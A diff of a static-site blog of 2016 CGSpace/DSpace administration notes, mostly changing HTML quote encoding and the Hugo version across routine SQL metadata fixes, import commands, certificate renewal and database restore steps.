<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
</code></pre><ul>
<li>But now we have double authors for &ldquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rdquo; in the authority</li>
<li>I&rsquo;m trying to do a Discovery index before messing with the authority index</li>
@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
<li>Run system updates on DSpace Test, re-deploy code, and reboot the server</li>
<li>Clean up and import ~200 CTA records to CGSpace via CSV like:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &amp;&gt; ~/CTA-May30/CTA-42229.log
</code></pre><ul>
<li>Discovery indexing took a few hours for some reason, and after that I started the <code>index-authority</code> script</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre><h2 id="2016-05-31">2016-05-31</h2>
<ul>
<li>The <code>index-authority</code> script ran over night and was finished in the morning</li>

View File

@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
<li>So the only difference is the &ldquo;confidence&rdquo;</li>
<li>Ok, well THAT is interesting:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
</code></pre><ul>
<li>And now an actually relevent example:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence = 500;
count
-------
707
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence != 500;
count
-------
253
@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
</code></pre><ul>
<li>Trying something experimental:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>And then re-indexing authority and Discovery&hellip;?</li>
@ -244,7 +244,7 @@ UPDATE 960
<li>Looks like this is all we need: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies">https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies</a></li>
<li>I wrote an XPath expression to extract the ILRI subjects from <code>input-forms.xml</code> (from the xmlstarlet package):</li>
</ul>
<pre tabindex="0"><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>Write to Atmire about the use of <code>atmire.orcid.id</code> to see if we can change it</li>
<li>Seems to be a virtual field that is queried from the authority cache&hellip; hmm</li>
@ -263,9 +263,9 @@ UPDATE 960
<li>It looks like the values are documented in <code>Choices.java</code></li>
<li>Experiment with setting all 960 CCAFS author values to be 500:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>After the database edit, I did a full Discovery re-index</li>
@ -320,7 +320,7 @@ UPDATE 960
<ul>
<li>CGSpace&rsquo;s HTTPS certificate expired last night and I didn&rsquo;t notice, had to renew:</li>
</ul>
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &quot;/usr/bin/service nginx stop&quot; --post-hook &quot;/usr/bin/service nginx start&quot;
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &#34;/usr/bin/service nginx stop&#34; --post-hook &#34;/usr/bin/service nginx start&#34;
</code></pre><ul>
<li>I really need to fix that cron job&hellip;</li>
</ul>
@ -328,8 +328,8 @@ UPDATE 960
<ul>
<li>Run the replacements/deletes for <code>dc.description.sponsorship</code> (investors) on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t &#39;correct investor&#39; -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
</code></pre><ul>
<li>The scripts for this are here:
<ul>
@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
</code></pre><ul>
<li>Run all cleanups and deletions of <code>dc.contributor.corporate</code> on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t &#39;Correct style&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t &#39;should be&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Re-deploy CGSpace and DSpace Test with latest June changes</li>
<li>Now the sharing and Altmetric bits are more prominent:</li>
@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ul>
<li>Wow, there are 95 authors in the database who have &lsquo;,&rsquo; at the end of their name:</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like &#39;%,&#39;;
</code></pre><ul>
<li>We need to use something like this to fix them, need to write a proper regex later:</li>
</ul>
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, &#39;(Poole, J),&#39;, &#39;\1&#39;) where metadata_field_id=3 and text_value = &#39;Poole, J,&#39;;
</code></pre>

View File

@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>We <em>really</em> only need <code>statistics</code> and <code>authority</code> but meh</li>
<li>Fix metadata for species on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>Will run later on CGSpace</li>
<li>A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is &ldquo;ungraded&rdquo;</li>
@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<ul>
<li>Delete 23 blank metadata values from CGSpace:</li>
</ul>
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 23
</code></pre><ul>
<li>Complete phase three of metadata migration, for the following fields:
@ -188,9 +188,9 @@ DELETE 23
</li>
<li>Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I then ran all server updates and rebooted the server</li>
</ul>
@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>I suspect it&rsquo;s someone hitting REST too much:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142

View File

@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
<li>Fix item display incorrectly displaying Species when Breeds were present (<a href="https://github.com/ilri/DSpace/pull/260">#260</a>)</li>
<li>Experiment with fixing more authors, like Delia Grace:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where metadata_field_id=3 and text_value=&#39;Grace, D.&#39;;
</code></pre><h2 id="2016-08-06">2016-08-06</h2>
<ul>
<li>Finally figured out how to remove &ldquo;View/Open&rdquo; and &ldquo;Bitstreams&rdquo; from the item view</li>
@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
<li>Install latest Oracle Java 8 JDK</li>
<li>Create <code>setenv.sh</code> in Tomcat 8 <code>libexec/bin</code> directory:</li>
</ul>
<pre tabindex="0"><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&quot;
CATALINA_OPTS=&quot;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&#34;
CATALINA_OPTS=&#34;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&#34;
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
</code></pre><ul>
@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<li>Fix &ldquo;CONGO,DR&rdquo; country name in <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/264">#264</a>)</li>
<li>Also need to fix existing records using the incorrect form in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;CONGO, DR&#39; where resource_type_id=2 and metadata_field_id=228 and text_value=&#39;CONGO,DR&#39;;
</code></pre><ul>
<li>I asked a question on the DSpace mailing list about updating &ldquo;preferred&rdquo; forms of author names from ORCID</li>
</ul>
@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
<li>Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB</li>
<li>They said I should delete the Atmire migrations</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = &#39;Atmire CUA 4 migration&#39; and version=&#39;5.1.2015.12.03.2&#39;;
dspacetest=# delete from schema_version where description = &#39;Atmire MQM migration&#39; and version=&#39;5.1.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that DSpace starts up by XMLUI now has unrelated issues that I need to solve!</li>
</ul>
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type &#39;ThemeResourceReader&#39; does not exist for &#39;map:read&#39; at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
</code></pre><ul>
<li>Looks like we&rsquo;re missing some stuff in the XMLUI module&rsquo;s <code>sitemap.xmap</code>, as well as in each of our XMLUI themes</li>
@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
<li>Clean up and import 48 CCAFS records into DSpace Test</li>
<li>SQL to get all journal titles from dc.source (55), since it&rsquo;s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ &#39;.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*&#39;;
</code></pre><h2 id="2016-08-25">2016-08-25</h2>
<ul>
<li>Atmire suggested adding a missing bean to <code>dspace/config/spring/api/atmire-cua.xml</code> but it doesn&rsquo;t help:</li>
</ul>
<pre tabindex="0"><code>...
Error creating bean with name 'MetadataStorageInfoService'
Error creating bean with name &#39;MetadataStorageInfoService&#39;
...
</code></pre><ul>
<li>Atmire sent an updated version of <code>dspace/config/spring/api/atmire-cua.xml</code> and now XMLUI starts but gives a null pointer exception:</li>
@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
<li>Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:</li>
</ul>
<pre tabindex="0"><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
</code></pre><ul>
<li>Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs</li>
</ul>

View File

@ -14,7 +14,7 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-09/" />
@ -32,9 +32,9 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre><ul>
<li>User who has been migrated to the root vs user still in the hierarchical structure:</li>
</ul>
@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
</ul>
<pre tabindex="0"><code>$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest createuser;'
$ psql dspacetest -c &#39;alter user dspacetest createuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql dspacetest -c &#39;alter user dspacetest nocreateuser;&#39;
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
</code></pre><ul>
<li>Some names that I thought I fixed in July seem not to be:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@ -163,12 +163,12 @@ $ vacuumdb dspacetest
</code></pre><ul>
<li>At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;c3a22456-8d6a-41f9-bba0-de51ef564d45&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
UPDATE 69
</code></pre><ul>
<li>And for Peter Ballantyne:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@ -180,26 +180,26 @@ UPDATE 69
</code></pre><ul>
<li>Again, a few have the correct ORCID, but there should only be one authority&hellip;</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;4f04ca06-9a76-4206-bd9c-917ca75d278e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
UPDATE 58
</code></pre><ul>
<li>And for me:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, A%&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
dspacetest=# update metadatavalue set authority=&#39;1a1943a0-3f87-402f-9afe-e52fb46a513e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, %&#39;;
UPDATE 11
</code></pre><ul>
<li>And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0e414b4c-4671-4a23-b570-6077aca647d8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
UPDATE 166
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
<ul>
